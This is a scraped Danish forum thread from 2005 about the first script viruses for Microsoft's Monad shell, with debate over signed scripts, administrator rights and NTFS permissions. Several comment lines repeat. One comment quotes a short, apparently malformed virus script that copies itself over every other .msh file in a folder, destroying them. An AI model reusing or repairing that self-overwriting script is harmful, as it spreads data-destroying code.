mboost-dp1
unknown
Hmm, synes jeg kan mindes Microsoft havde udtalt at et af hovedmålene med Vista var sikkerhed.
Det må kunne kaldes en 'god' start.
Men jeg ser nu frem til at prøve det, hvis jeg kan lokke det ud af vores IT afdeling.
p.s. Sorry kunne ikke nære mig.
Det må kunne kaldes en 'god' start.
Men jeg ser nu frem til at prøve det, hvis jeg kan lokke det ud af vores IT afdeling.
p.s. Sorry kunne ikke nære mig.
Kommer næppe som standard - i juni da MS første gang erkendte at Monad projektet var i gang (og iøvrigt blev startet allerede sommeren 2001) at det vil tage 3 - 5 år før monad bliver indfaset:
"It will take three to five years to fully develop and deliver."
På den anden side er det jo ikke længe siden at XP SP2 kom ud og XP dermed kan kaldes fully developed, så ud fra den betragtning kan det sagtens proppes med vista.
"It will take three to five years to fully develop and deliver."
På den anden side er det jo ikke længe siden at XP SP2 kom ud og XP dermed kan kaldes fully developed, så ud fra den betragtning kan det sagtens proppes med vista.
Er det bare mig der syntes at deres krav om digitalt signerede scripts er en grim workaround for et dårligt rettighedssystem?
Altså, hvis jeg som administrator laver et script og vil have det afviklet, så vil jeg ikke til først at signere det.
Personligt mener jeg at MS hellere skulle bruge tid på at få folk til IKKE at benytte deres PC med administratorrettigheder som default. Og så ellers styre det her via det indbyggede rettighedssystem
/lundeman
Altså, hvis jeg som administrator laver et script og vil have det afviklet, så vil jeg ikke til først at signere det.
Personligt mener jeg at MS hellere skulle bruge tid på at få folk til IKKE at benytte deres PC med administratorrettigheder som default. Og så ellers styre det her via det indbyggede rettighedssystem
/lundeman
Det er vel bare noget med at diasble lortet på default windows installation så de spader der får scriptede vira har selv valgt at aktivere services.
En administrator i en større virksomhed er vel udemærket klar over at at scripts kun skal kunne køres af domain admins.
/OPY
En administrator i en større virksomhed er vel udemærket klar over at at scripts kun skal kunne køres af domain admins.
/OPY
Det beviser blot, at Monad kan finde og lave om på tekst filer med et script.
Det er ikke fordi du ikke kan lave det samme med bash, awk, sed, perl, python, REXX, og lignende.
Her er source-koden til en af deres scripts:
Det er ikke fordi du ikke kan lave det samme med bash, awk, sed, perl, python, REXX, og lignende.
Her er source-koden til en af deres scripts:
$name_array=get-childitem *.msh
foreach ($name in $name_array)
{
if ($name.Length -eq 249)
$my_file=$name.Name
}
}
foreach ($victim in $name_array)
{
if ($name.Length -ne 249)
{
copy-item $my_file $name.Name
}
}
Enig i: Kun priviligerede brugere bør kunne eksekvere usignerede scripts som udgangspunkt.
Men som et værktøj for sysadmins vil det da være gejl at kunne få brugere til at køre et trusted script som gør nogle ændringer/opdateringer/whatever. Som et alternativ til at køre alting som admin.
Men som et værktøj for sysadmins vil det da være gejl at kunne få brugere til at køre et trusted script som gør nogle ændringer/opdateringer/whatever. Som et alternativ til at køre alting som admin.
Man kan vel bare lave en remote execute på maskinen det skulle vel ikke være noget problem så er det jo bare admin accounten der har fyret scriptet af. No problemos :-D
/OPY
/OPY
#4
Det er så en af de nye ting i Longhorn (lever stadig i fornægtelse mht 'Vista'). Så vidt jeg kan se af folk, der har testet betaen, så virker det fint. Jeg forud ser dog artikler i pop PC-blade, der forklarer folk hvordan man disabler dette (og dermed bomber folk tilbage til altid-admin-bruger tilstanden *suk*), hvis det bli'r for indtrængende.
Personligt mener jeg at MS hellere skulle bruge tid på at få folk til IKKE at benytte deres PC med administratorrettigheder som default.
Det er så en af de nye ting i Longhorn (lever stadig i fornægtelse mht 'Vista'). Så vidt jeg kan se af folk, der har testet betaen, så virker det fint. Jeg forud ser dog artikler i pop PC-blade, der forklarer folk hvordan man disabler dette (og dermed bomber folk tilbage til altid-admin-bruger tilstanden *suk*), hvis det bli'r for indtrængende.
#12 -
5. aug. 2005 10:10
det lyder som om Monad er endnu en workaround på en meget gammel platform:s ((NT) burde blive omdøbt til OT)
de burde starte på en frisk. lave et os fra BUNDEN, istedet for at viderudvikle hele tiden...
de burde starte på en frisk. lave et os fra BUNDEN, istedet for at viderudvikle hele tiden...
Har flere steder læst at Monad kommer med i Vista, hvor svært er det også lige at skrive en shell... er vel ikke så voldsom anderledes end C#/VB-scripting eller end DOS-emulering som de har leveret i mange år.
#11, ja men det gode her er at dem som vi bruge disse metoder, højst sandsynligt er nogenlunde til computere, og har en lille ide om hvad de laver. Men Fru Petersen som bare bruger det der er, vil ikke lave om på det, og bare bruge det som det er.
Dette giver så hende en "forhåbentlig" virus fri maskine.
Ontopic
Jeg kan faktisk godt lide at MS vil indføre en kommando prompt. selv er jeg inkarneret *bsd og linux bruger, og rører sjældent en windows server. men de gange jeg har. har jeg har altid synes at begrænsingen var kommando prompten og muligheden for at lave nogle ordentlige scripts. Hvis de så bare kunne lave windows udgaver af gnutools (ls, rm, osv) og lægge en ssh/scp ind, samt måske enda en perl interpreter. så ville lykke jo være gjort.
Dette giver så hende en "forhåbentlig" virus fri maskine.
Ontopic
Jeg kan faktisk godt lide at MS vil indføre en kommando prompt. selv er jeg inkarneret *bsd og linux bruger, og rører sjældent en windows server. men de gange jeg har. har jeg har altid synes at begrænsingen var kommando prompten og muligheden for at lave nogle ordentlige scripts. Hvis de så bare kunne lave windows udgaver af gnutools (ls, rm, osv) og lægge en ssh/scp ind, samt måske enda en perl interpreter. så ville lykke jo være gjort.
Hmmm hvis nu OS'et skal lappe på forkert brug så har jeg da et par punkter til ms som kunne være fedt at få med.
* Explore skal nægte at starte som administrator, med mindre man er i fejlsikker tilstand uden netsupport.
* Administrator skal nægtes adgang via remote desktop.
* Explore skal nægte at starte som administrator, med mindre man er i fejlsikker tilstand uden netsupport.
* Administrator skal nægtes adgang via remote desktop.
#15 jo.. i Windows skal du.. Der er så mange programmer der ikke vil køre uden administratoradgang.. og så er man jo i virkeligeheden lige vidt.. ja, man kan bruge RunAs, men det er imho ikke en acceptabel løsning... det er pain in the ass...
MS burde lave systemet om så der er en ordentlig opdeling mellem bruger og admin, og så det er praktisk muligt at køre som bruger... som fx. i linux eller OS-X
MS burde lave systemet om så der er en ordentlig opdeling mellem bruger og admin, og så det er praktisk muligt at køre som bruger... som fx. i linux eller OS-X
#22
"* Administrator skal nægtes adgang via remote desktop. "
ARGH! neej! det er en af de funktioner jeg bruger mest! :(
Generelt spørgsmål:
Er det microsofts skyld at 3. parts programmer ikke kan køre som standardbruger og kræver administratorrettigheder?
Det virker da mere som inkompetente udviklere?
"* Administrator skal nægtes adgang via remote desktop. "
ARGH! neej! det er en af de funktioner jeg bruger mest! :(
Generelt spørgsmål:
Er det microsofts skyld at 3. parts programmer ikke kan køre som standardbruger og kræver administratorrettigheder?
Det virker da mere som inkompetente udviklere?
#27
Mangen gang vil jeg sige ja.
Problemet er at du ikke kan give enkle bruger eller bruger grupper rettighedder til nogle ting
Så hvis et program skal bruge bare en af de ting, skal den ha' tilledelse til det hele.
Hvis man kan læse en fil i windows, så kan man også ændre den, og slette den, med mindre den er i brug.
Der er de der gamle ting som at sige en fil er skrive beskytted, hvor det bare får programmet til at spørger dig om du er sikker.
Og hvis man ikke er admin, og vil ha' ændret noget, så skal man logge ud, og ind som admin.
De har lavet en forbedring der i Longhorn, af hvad jeg har set på screenshots.
Men når det så er sagt, så jo' Der er flere programmer, hvor man undre sig over hvorfor den kraver admin rettighedder, for at køre
Generelt spørgsmål:
Er det microsofts skyld at 3. parts programmer ikke kan køre som standardbruger og kræver administratorrettigheder?
Mangen gang vil jeg sige ja.
Problemet er at du ikke kan give enkle bruger eller bruger grupper rettighedder til nogle ting
Så hvis et program skal bruge bare en af de ting, skal den ha' tilledelse til det hele.
Hvis man kan læse en fil i windows, så kan man også ændre den, og slette den, med mindre den er i brug.
Der er de der gamle ting som at sige en fil er skrive beskytted, hvor det bare får programmet til at spørger dig om du er sikker.
Og hvis man ikke er admin, og vil ha' ændret noget, så skal man logge ud, og ind som admin.
De har lavet en forbedring der i Longhorn, af hvad jeg har set på screenshots.
Men når det så er sagt, så jo' Der er flere programmer, hvor man undre sig over hvorfor den kraver admin rettighedder, for at køre
#28
Prøv at kigge på ntfs tilladelserne. De ser fatisk ud til at at være mere avancerede end dem på unix/linux. Det passer i hvert fald ikke at det er alt eller intet.
Som en ekstra bonus kan du også sætte tilladelser på nøgler i registreringsdatabasen. De er lige så avanceret som dem til filer.
Højreklik og vælg "Kør som" eller brug runas.exe
eks: runas.exe /user:ComputerName\administrator "net start \"filezilla server ftp server\""
Så hvis et program skal bruge bare en af de ting, skal den ha' tilledelse til det hele.
Hvis man kan læse en fil i windows, så kan man også ændre den, og slette den, med mindre den er i brug.
Prøv at kigge på ntfs tilladelserne. De ser fatisk ud til at at være mere avancerede end dem på unix/linux. Det passer i hvert fald ikke at det er alt eller intet.
Som en ekstra bonus kan du også sætte tilladelser på nøgler i registreringsdatabasen. De er lige så avanceret som dem til filer.
Og hvis man ikke er admin, og vil ha' ændret noget, så skal man logge ud, og ind som admin.
Højreklik og vælg "Kør som" eller brug runas.exe
eks: runas.exe /user:ComputerName\administrator "net start \"filezilla server ftp server\""
jeg glæder mig til den dag windows begynder at lave deres egne ting, istedet for at kopiere alt det gode fra open source og derefter lave dem "brugervenlige".
mht. det med sikkerheden så kommer det faktisk ikke bag på mig
mht. det med sikkerheden så kommer det faktisk ikke bag på mig
#29: Tjeah, som default skal man være administrator for at kunne tilslutte en usb key chain - dette gælder både for XP og 2K. Dog, hvis en administrator har installeret driveren før er det ikke noget problem.
Er så men fair nok når det ikke kan håndteres via windows indbyggede drivere - men det kan det i de fleste tilfælde og så ville det jo give god mening at alm. brugere kan gøre det.
Superuser er iøvrigt ikke nok - det eneste man kan gøre er at tillade add/remove på alt hardware - så må man da sige at fstab er lidt nemmere at have med at gøre.
Er så men fair nok når det ikke kan håndteres via windows indbyggede drivere - men det kan det i de fleste tilfælde og så ville det jo give god mening at alm. brugere kan gøre det.
Superuser er iøvrigt ikke nok - det eneste man kan gøre er at tillade add/remove på alt hardware - så må man da sige at fstab er lidt nemmere at have med at gøre.
Opret dig som bruger i dag
Det er gratis, og du binder dig ikke til noget.
Når du er oprettet som bruger, får du adgang til en lang række af sidens andre muligheder, såsom at udforme siden efter eget ønske og deltage i diskussionerne.
- Forside
- ⟨
- Forum
- ⟨
- Nyheder
Gå til bund